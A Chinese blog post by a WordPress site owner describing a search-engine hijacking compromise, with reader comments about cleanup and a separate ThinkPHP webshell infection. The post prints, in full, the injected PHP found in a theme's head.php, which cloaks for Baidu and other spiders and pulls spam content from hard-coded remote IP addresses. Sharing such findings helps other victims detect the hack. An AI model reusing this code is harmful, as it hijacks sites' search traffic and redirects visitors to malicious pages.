最近,本人的这个网站被黑了,哈哈,流量从1000直接被百度K站,后来发现,本网站在搜索引擎里面全是不可描述 的关键字,哈哈,你懂的,那么如何解决这个问题,除了加强防护之外,还得清除代码,实在找不到?直接找个未安装的原版文件全部替换最为简单。经过研究,本次搜索引擎劫持入侵,主要体现在两个方面。
一、网站根目录出现了与众不同的文件
例如本站是通过WordPress制作的,多了一个wp-blog.php文件,我硬是没有检查出来,这个文件也太像WordPress里面自带的文件了。
二、模板文件
我在模板文件的网站下的head.php出现了如下代码
set_time_limit(30);error_reporting(0);defined('url') or define('url',$_SERVER['REQUEST_URI']);defined('ref') or define('ref',$_SERVER['HTTP_REFERER']);defined('ent') or define('ent',$_SERVER['HTTP_USER_AGENT']);defined('site') or define('site','http://155.159.254.150');defined('road') or define('road',"/?road=".$_SERVER['HTTP_HOST'].url."&der=".ent);defined('regs') or define('regs','@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Sm.cn@i');$format=[".xml",".doc",".pdf",".txt",".ppt",".pptx",".xls",".csv",".shtml",".docx",".xlsx"];foreach($format as $k => $v){if(stristr(url,$v)){$bool=TRUE;break;}else{$bool=FALSE;}}defined('area') or define('area',$bool);if(area && preg_match(regs,ref)){echo g1('http://155.159.254.180/sb.html');exit;}if(preg_match(regs,ent)){if(area){echo g1(site.road);exit;}else{echo g1("http://155.159.254.163/u.php");ob_flush();flush();}}function g1($f){$c=array('http'=>array('method'=>"GET"));$g=stream_context_create($c);$h=file_get_contents($f,false,$g);if(!empty($h)){return $h;}}
狗日的,害得我网站被K,一旦百度中来的WAP流量,直接给转向不可描述的网站。如果PC流量就直接给你显示一个CNZZ的统计代码。最无耻的是,他还把代码加密。
再骂一句,狗日的坏人,一天净干坏事。
您好博客主,我想请教下,您在这次挂马劫持快照后删除木马后,百度恢复这块该怎么做呢,我的站点跟你的情况一样,也是相同的快照劫持代码一模一样。我那个是中木马3个月后才发现的,已经产生了上万条的不良信息了。现在木马删除了,网站安全也做了。产生的这些垃圾快照每天在投诉,尤其现在产生的这些不规则的链接百度蜘蛛还每天在爬取,我site您站点还是有些不好的快照描述。点击去也是您站点内容但是也是有这样的不规则的网址 https://www.music4x.com/post/1182?ID=720466587.docx
https://www.music4x.com/?067815141139.pptx 后缀都是doc pptx xsl等。在百度站长反馈问题,毛用没有,答非所问。博客主看到留言后麻烦回复下帮助下我谢谢了。
没有办法,现在网站流量只有原来的10/1,只有慢慢更新,等百度自然恢复,我也投诉过,百度的回复也一样漫不经心。
去年我自己Thinkphp4.3写了个小网站,丢在服务器上没管,因为Thinkphp有漏洞,被黑客传了木马,跨站到博客上,挂了个太阳城的木马,我直接关了网站,把所有文件打包用河马和360扫了一遍,结果发现了wp_cofig文件,webshell密码用md5倒是撞出来了,但是密码没有任何帮助,还是不晓得谁那么缺德。血的教训
现在坏人多得很。